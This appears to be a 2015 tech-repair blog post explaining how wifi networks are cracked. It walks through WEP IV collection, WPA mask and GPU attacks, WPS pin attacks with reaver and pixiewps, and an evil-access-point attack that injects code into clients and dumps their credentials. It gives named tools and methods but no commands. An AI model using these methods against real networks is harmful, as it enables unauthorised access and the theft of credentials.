Local Tech Repair: How a Cracker breaks wifi and more details, WEP,WPA,WPA2,WPS and more

Tuesday, June 23, 2015

How a Cracker breaks wifi and more details, WEP,WPA,WPA2,WPS and more


Attacking wifi tools and how attacks work.
Wifi types are open, wep, wpa1, WPA2, wpa2 enterprise. There are also services on wifi to help people connect for the first time easier.  This service is called wps.  WPS is either active or passive. So here are the bellow


And here is the explanation for the different wifi types of connections and attacks and security against them.


Open:

There are open wifi networks are just that open to everyone. There is not much to do here than connect.
 
Wep:

Wired Equivalent Privacy is the first encryption type for wifi. It's not meant to be the most secure but better than nothing. There is an vulnerability in wep protocol is a vulnerability in the rc4 cipher stream. the Fluhrer, martin, and Shamir attack (FMS) is a n attack to recover the key in large number of message streams. This attack is in the weak initialization vectors on the rc4 for wep. by gathering a lot of IVs around 50k you should be able to easily get the key. Read more about the actual attack and the link above.
These attacks are easy to implement in various tools like aircrack or scripts that automate the attack for you like wifite or wepcrackgui.
So the attack goes like this generally speaking. attacker puts card in monitor mode with something like airmon-ng, then once in monitor mode the card can pick up packets across the air even if it is not connected to that network (see monitor mode). From there attacker picks a channel of his target and begins his attack. After capturing IV packets by either deauthenticating the client, doing a replay attack, or some other attack the attacker tries to then use a FMS attack against the IVs and get the key.
For another simple explanation of the WEP attack can be found here


WPA1:

wifi protected access is leaps and bounds ahead of WEP though still has some issues with it. weak keys, wpa packet spoofing and decryption. with WPA there are attacks against the WPA-TKIP allowing decrypt packets and then inject the packets to hijeck connections.
you can read more about the actual attacks at the bellow links
https://lirias.kuleuven.be/bitstream/123456789/401042/1/wpatkip.pdf
http://dl.aircrack-ng.org/breakingwepandwpa.pdf
http://download.aircrack-ng.org/wiki-files/doc/enhanced_tkip_michael.pdf

there are 2 basic encryption protocols with WPA CCMP and TKIP. most the attacks above use the TKIP. the if the nettwork is using CCMP then its using the AES cipher which is a lot stronger.
Though other attacks against WPA personal (WPA1-PSK) is to run either a dictionary attack against the handshake or if the SSID is a common SSID to use a rainbow table. Rainbow tables are generally not used because the way WPA works is that it stalts the password hashes with the SSID of the wifi network. This means that 2 networks with 2 different SSIDs and the same passwords would have 2 different pairwise master keys PMKs. So less you have a user with a simple dictionary word or a common ssid name brute forcing is generally not the best option out there. Though this does not mean its not possible if you take into human habit and the standard into account. the WPA-PSK requires the passphrase to be 8-63 characters long. Knowing this fact and the fact that humans want to try the least possible they most likely will use a word starting and being only 8 digits long aka the minimum length required. This allows an attacker to create mask attacks against the wpa keys in hoping that the human element is what created the weakness. Since a mask attack does not require brute forcing 1-7 digits it starts at only trying the 8 digits and then on top of that starting with trying only say the first 4 characters of the password be letter and then ending with numbers or symbols you can reduce the attack brute force dramatically in time making a brute force with a GPU possible. here is a benchmark on how fast a single GPU can run for pyrit HERE. So if you combine a lot of GPUs together like the amazon cloud or just creating your own farm or botnet. then cracking a WPA is a lot faster than expected.
you can find out more about the WPA1 standard at the bellow link
https://en.wikipedia.org/wiki/IEEE_802.11


WPA2 Personal (aka WPA2-PSK):

along with the mention above with WPA the WPA2 protofal was built to fix shortcomings in the authentication and privacy of WPA1. i wont go over a lot of the information again about the attacks. Though WPA2 in general has less flaws in it than WPA though the attack vectors are still the same.

WPA Enterprise:

WPA-Enterprise is the use of a RADIUS or a TACACS+ server to authenticate connections on the network. The only major flaw found in it is the MS-CHAPv2 which severely reduces the complexity of brute-force attacks. Check out the bellow link for more information on the attack. https://www.cloudcracker.com/blog/2012/07/29/cracking-ms-chap-v2/

WPS:

Wps as a protocol to help non technical users to easily setup wifi networks where they wouldn’t have to type out complex passwords but only push a button and connect. you can find out more about WPS at the bellow link
https://en.wikipedia.org/wiki/Wi-Fi_Protected_Setup
with the WPS attack by reaver was originally explained here and explained here and then was later developed and improved upon by wiire with the pixie dust attack and can find the code for it here pixiewps .
A more updated toolset is located at the next 2 links for reaver and pixiewps

since there is a huge amount of resource for information on both the links above i won’t go into the attacks much or how they are done.
instead even better… VIDEO!!!!






To sum all this up the easiest attack is against WEP or WPS depending on the encryption used and if one is implemented. Though if neither of these are used or turned off then using another attack method is generally used or the attack is given up on. the attacker could try to brute force the pin hoping the human created it insecurely or what is not commonly though of is doing a evil AP attack on the client. This attack would de-authenticate the client from the valid SSID and then if they connected to a open network like starbucks wifi or attwifi etc. you can create a SSID with that name and most systems will automatically connect once they are connected to your system and passing their network packets through your machine you can then inject code into the trp connections and gain access to their computer. Once in their computer you have the ability to dump the wifi authentication credentials. When an attacker attacks wifi its not always the wifi protocol that they attack. I hope this helps you learn how its done. so to close it all off… i will show you the easy automated way of doing it from your android phone… yep android.